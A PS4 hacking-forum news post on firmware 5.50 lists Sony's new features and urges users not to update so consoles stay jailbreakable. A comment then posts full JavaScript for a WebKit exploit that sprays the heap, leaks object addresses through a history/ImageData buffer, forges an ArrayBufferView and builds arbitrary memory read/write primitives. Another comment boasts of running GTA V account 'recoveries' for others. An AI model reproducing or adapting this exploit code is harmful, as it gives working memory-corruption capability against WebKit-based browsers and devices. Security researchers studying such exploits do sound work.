Join Us and become a Member for a Verified Badge to access private areas with the latest PS4 PKGs.
PS4 News       Thread starter PSXHAX       Start date Mar 8, 2018 at 4:40 AM       109      
Status
Not open for further replies.
Since their previous update we've seen KEIJI PS4 System Software / Firmware 5.50 features including PS4 Pro SuperSampling and more recently the full PS4 5.50 OFW feature list which can also be found below. :fire:

:alert: As always, don't update your PlayStation 4 Firmware if you plan to exploit and jailbreak your PS4 console and to recap here's the PS4 Update Blocker, a Manual Blocking Guide / Video and how to Remove Downloaded PUPs if they haven't been installed yet.

Download: PS4 Firmware 5.50 Update (US) / PS4 Firmware 5.50 Update (EU) / PS4 Firmware 5.50 Update (UK) / PS4 Firmware 5.50 Update (AU/NZ) / PS4 Firmware 5.50 Update (JP)

To quote from Sony's Official Page on the 5.50 OFW changes: Main features in version 5.50 update
  • As a family manager, parent, or guardian, you can now monitor your child's time played (the amount of time they've spent logged in to the PS4) and set restrictions accordingly.To manage play time settings for each child, select(Settings) > [Parental Controls/Family Management] > [Family Management].
    • You can view your child's total time played for the day.
    • You can limit how long your child plays per day, and set playable hours to prevent play late at night or other unwanted times. Restrictions can be set for each day of the week.
    • When the set play time ends, a pop-up notification appears repeatedly on the screen to let your child know that they're out of play time. If you choose, the PS4 can automatically log your child out when play time ends.
    • You can also extend or shorten your child's play time on the day they play.
    • You can view and manage your child's play time anytime from your PC or smartphone using the(PlayStation App) or by visiting this website. https://www.playstation.com/acct/family
  • The following features have been added to(Library).
    • [PlayStation Plus] will now appear if you were ever a PlayStation Plus subscriber. You can keep track of all your free PS Plus games.
    • You can now hide games and applications you no longer need from [Purchased]. Highlight a game or application, press the OPTIONS button, and then select [Do Not Show Content Item in [Purchased]].
Other features in version 5.50
  • [Supersampling Mode] has been added to(Settings) > [Sound and Screen] > [Video Output Settings]. Enable this mode to improve image quality in some games when your PlayStation 4 Pro is connected to a TV with 2K resolution or lower.This setting is available only on PlayStation 4 Pro.
  • You can now customize logos and backgrounds with your favorite images. On the image selection screen, select image files from a USB storage device. Customize any of the following.
    • Team logo
    • Team cover image
    • Background image for the home screen
    • Image for the message group
  • On the quick menu,(Online Friends) has been changed to(Friends). From here, you can view online Friends and custom lists.
  • Music playback functions on the quick menu have been improved.
  • You can now create events from the team profile screen. On the screen, select [Events] > [Create Event for This Team].
  • Easily find games that can be played on PlayStation VR from the home screen or(Library).(PS VR) appears next to supported games.
  • You can now delete notifications. Select(Notifications) to display the notifications list, press the OPTIONS button, and then select [Delete].
  • You can now choose who can view the list of players you follow and who can view the list of your followers separately.Select(Settings) > [Account Management] > [Privacy Settings] > [Friends | Connections].
We'll add updates to this article throughout the day as PS4 scene developers examine 5.50 and share their feedback, thus far end-users are reporting that the PS4 5.XX WebKit Exploit (aka PS4 Breacher alongside another 5.50 WebKit Exploit) is still working since 5.50 moved out of Beta but chances are it patches other useful things (such as kernel exploits) so stay tuned with these Tweets making rounds already:
The system software for the "3/8" release of the PS4 has been confirmed that the Save editor (including TYPE0) does not work. If you are currently using the Save editor, please do not update. We will guide you through the news announcements and our official site for future correspondence.
System Software 5.50 is NOT compatible with Save Wizard for PS4 MAX. Only System Software 5.05 or below is compatible with Save Wizard for PS4 MAX. Make sure you disable updates (or better still disconnect from the internet!) to prevent accidental updating.
PS4 EXPLOIT 5.50 Webkit Hack (TUTORIAL)
Cheers to @SheenuTheLegend for passing along the news in the PSXHAX Shoutbox early this morning on the new 5.50 PS4 OFW update. :beer:
PS4 System Software  Firmware 5.50 (KEIJI) Live, Don't Update!.jpg
 

Comments

To be honest people don't need to get online with your ps4 hopefully it stays private because we don't need kids running around charging $2 for PS4 GTA Recoveries and Call of Duty Lobbies then the white knights FREE LOBBY JOIN NOW smh.
 
I have used my recovery sprx on around 20-30 accounts in GTA V on my CFW PS3. People ask me to help them all the time and I do. I don't see the issue with it.
 
Code:
function makeid() {
   var text = "";
   var possible = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789";

   for (var i = 0; i < 8; i++)
       text += possible.charAt(Math.floor(Math.random() * possible.length));

   return text;
};

var instancespr = [];

for (var i = 0; i < 4096; i++) {
   instancespr[i] = new Uint32Array(1);
   instancespr[i][makeid()] = 50057; /* spray 4-field Object InstanceIDs */
}

var _dview;

function u2d(low, hi) {
   if (!_dview) _dview = new DataView(new ArrayBuffer(16));
   _dview.setUint32(0, hi);
   _dview.setUint32(4, low);
   return _dview.getFloat64(0);
}
var dgc = function() {
   for (var i = 0; i < 0x100; i++) {
       new ArrayBuffer(0x100000);
   }
}

function int64(low, hi) {
   this.low = (low >>> 0);
   this.hi = (hi >>> 0);

   this.add32inplace = function(val) {
       var new_lo = (((this.low >>> 0) + val) & 0xFFFFFFFF) >>> 0;
       var new_hi = (this.hi >>> 0);

       if (new_lo < this.low) {
           new_hi++;
       }

       this.hi = new_hi;
       this.low = new_lo;
   }

   this.add32 = function(val) {
       var new_lo = (((this.low >>> 0) + val) & 0xFFFFFFFF) >>> 0;
       var new_hi = (this.hi >>> 0);

       if (new_lo < this.low) {
           new_hi++;
       }

       return new int64(new_lo, new_hi);
   }

   this.sub32 = function(val) {
       var new_lo = (((this.low >>> 0) - val) & 0xFFFFFFFF) >>> 0;
       var new_hi = (this.hi >>> 0);

       if (new_lo > (this.low) & 0xFFFFFFFF) {
           new_hi--;
       }

       return new int64(new_lo, new_hi);
   }

   this.sub32inplace = function(val) {
       var new_lo = (((this.low >>> 0) - val) & 0xFFFFFFFF) >>> 0;
       var new_hi = (this.hi >>> 0);

       if (new_lo > (this.low) & 0xFFFFFFFF) {
           new_hi--;
       }

       this.hi = new_hi;
       this.low = new_lo;
   }

   this.and32 = function(val) {
       var new_lo = this.low & val;
       var new_hi = this.hi;
       return new int64(new_lo, new_hi);
   }

   this.and64 = function(vallo, valhi) {
       var new_lo = this.low & vallo;
       var new_hi = this.hi & valhi;
       return new int64(new_lo, new_hi);
   }

   this.toString = function(val) {
       val = 16;
       var lo_str = (this.low >>> 0).toString(val);
       var hi_str = (this.hi >>> 0).toString(val);

       if (this.hi == 0)
           return lo_str;
       else
           lo_str = zeroFill(lo_str, 8)

       return hi_str + lo_str;
   }

   this.toPacked = function() {
       return {
           hi: this.hi,
           low: this.low
       };
   }

   this.setPacked = function(pck) {
       this.hi = pck.hi;
       this.low = pck.low;
       return this;
   }

   return this;
}

function zeroFill(number, width) {
   width -= number.toString().length;

   if (width > 0) {
       return new Array(width + (/\./.test(number) ? 2 : 1)).join('0') + number;
   }

   return number + ""; // always return a string
}

var nogc = [];

var fail = function() {
   alert.apply(null, arguments);
   throw "fail";
}

// Target JSObject for overlap
var tgt = {
   a: 0,
   b: 0,
   c: 0,
   d: 0
}

var y = new ImageData(1, 0x4000)
postMessage("", "*", [y.data.buffer]);

// Spray properties to ensure object is fastmalloc()'d and can be found easily later
var props = {};

for (var i = 0;
   (i < (0x4000 / 2));) {
   props[i++] = {
       value: 0x42424242
   };
   props[i++] = {
       value: tgt
   };
}

var foundLeak = undefined;
var foundIndex = 0;
var maxCount = 0x100;

while (foundLeak == undefined && maxCount > 0) {
   maxCount--;

   history.pushState(y, "");

   Object.defineProperties({}, props);

   var leak = new Uint32Array(history.state.data.buffer);

   for (var i = 0; i < leak.length - 6; i++) {
       if (
           leak[i] == 0x42424242 &&
           leak[i + 0x1] == 0xFFFF0000 &&
           leak[i + 0x2] == 0x00000000 &&
           leak[i + 0x3] == 0x00000000 &&
           leak[i + 0x4] == 0x00000000 &&
           leak[i + 0x5] == 0x00000000 &&
           leak[i + 0x6] == 0x0000000E &&
           leak[i + 0x7] == 0x00000000 &&
           leak[i + 0xA] == 0x00000000 &&
           leak[i + 0xB] == 0x00000000 &&
           leak[i + 0xC] == 0x00000000 &&
           leak[i + 0xD] == 0x00000000 &&
           leak[i + 0xE] == 0x0000000E &&
           leak[i + 0xF] == 0x00000000
       ) {
           foundIndex = i;
           foundLeak = leak;
           break;
       }
   }
}

if (!foundLeak) {
   failed = true
   fail("Failed to find leak!")
}

var firstLeak = Array.prototype.slice.call(foundLeak, foundIndex, foundIndex + 0x40);
var leakJSVal = new int64(firstLeak[8], firstLeak[9]);

Array.prototype.__defineGetter__(100, () => 1);

var f = document.body.appendChild(document.createElement('iframe'));
var a = new f.contentWindow.Array(13.37, 13.37);
var b = new f.contentWindow.Array(u2d(leakJSVal.low + 0x10, leakJSVal.hi), 13.37);

var master = new Uint32Array(0x1000);
var slave = new Uint32Array(0x1000);
var leakval_u32 = new Uint32Array(0x1000);
var leakval_helper = [slave, 2, 3, 4, 5, 6, 7, 8, 9, 10];

// Create fake ArrayBufferView
tgt.a = u2d(2048, 0x1602300);
tgt.b = 0;
tgt.c = leakval_helper;
tgt.d = 0x1337;

var c = Array.prototype.concat.call(a, b);
document.body.removeChild(f);
var hax = c[0];
c[0] = 0;

tgt.c = c;

hax[2] = 0;
hax[3] = 0;

Object.defineProperty(Array.prototype, 100, {
   get: undefined
});

tgt.c = leakval_helper;
var butterfly = new int64(hax[2], hax[3]);
butterfly.low += 0x10;

tgt.c = leakval_u32;
var lkv_u32_old = new int64(hax[4], hax[5]);
hax[4] = butterfly.low;
hax[5] = butterfly.hi;
// Setup read/write primitive

tgt.c = master;
hax[4] = leakval_u32[0];
hax[5] = leakval_u32[1];

var addr_to_slavebuf = new int64(master[4], master[5]);
tgt.c = leakval_u32;
hax[4] = lkv_u32_old.low;
hax[5] = lkv_u32_old.hi;

tgt.c = 0;
hax = 0;

var prim = {
   write8: function(addr, val) {
       master[4] = addr.low;
       master[5] = addr.hi;

       if (val instanceof int64) {
           slave[0] = val.low;
           slave[1] = val.hi;
       } else {
           slave[0] = val;
           slave[1] = 0;
       }

       master[4] = addr_to_slavebuf.low;
       master[5] = addr_to_slavebuf.hi;
   },

   write4: function(addr, val) {
       master[4] = addr.low;
       master[5] = addr.hi;

       slave[0] = val;

       master[4] = addr_to_slavebuf.low;
       master[5] = addr_to_slavebuf.hi;
   },

   read8: function(addr) {
       master[4] = addr.low;
       master[5] = addr.hi;

       var rtv = new int64(slave[0], slave[1]);

       master[4] = addr_to_slavebuf.low;
       master[5] = addr_to_slavebuf.hi;

       return rtv;
   },

   read4: function(addr) {
       master[4] = addr.low;
       master[5] = addr.hi;

       var rtv = slave[0];

       master[4] = addr_to_slavebuf.low;
       master[5] = addr_to_slavebuf.hi;

       return rtv;
   },

   leakval: function(jsval) {
       leakval_helper[0] = jsval;
       var rtv = this.read8(butterfly);
       this.write8(butterfly, new int64(0x41414141, 0xffffffff));

       return rtv;
   },

   createval: function(jsval) {
       this.write8(butterfly, jsval);
       var rt = leakval_helper[0];
       this.write8(butterfly, new int64(0x41414141, 0xffffffff));
       return rt;
   }
};

window.primitives = prim;
if (window.postExpl) window.postExpl();
 
Status
Not open for further replies.
Back
Top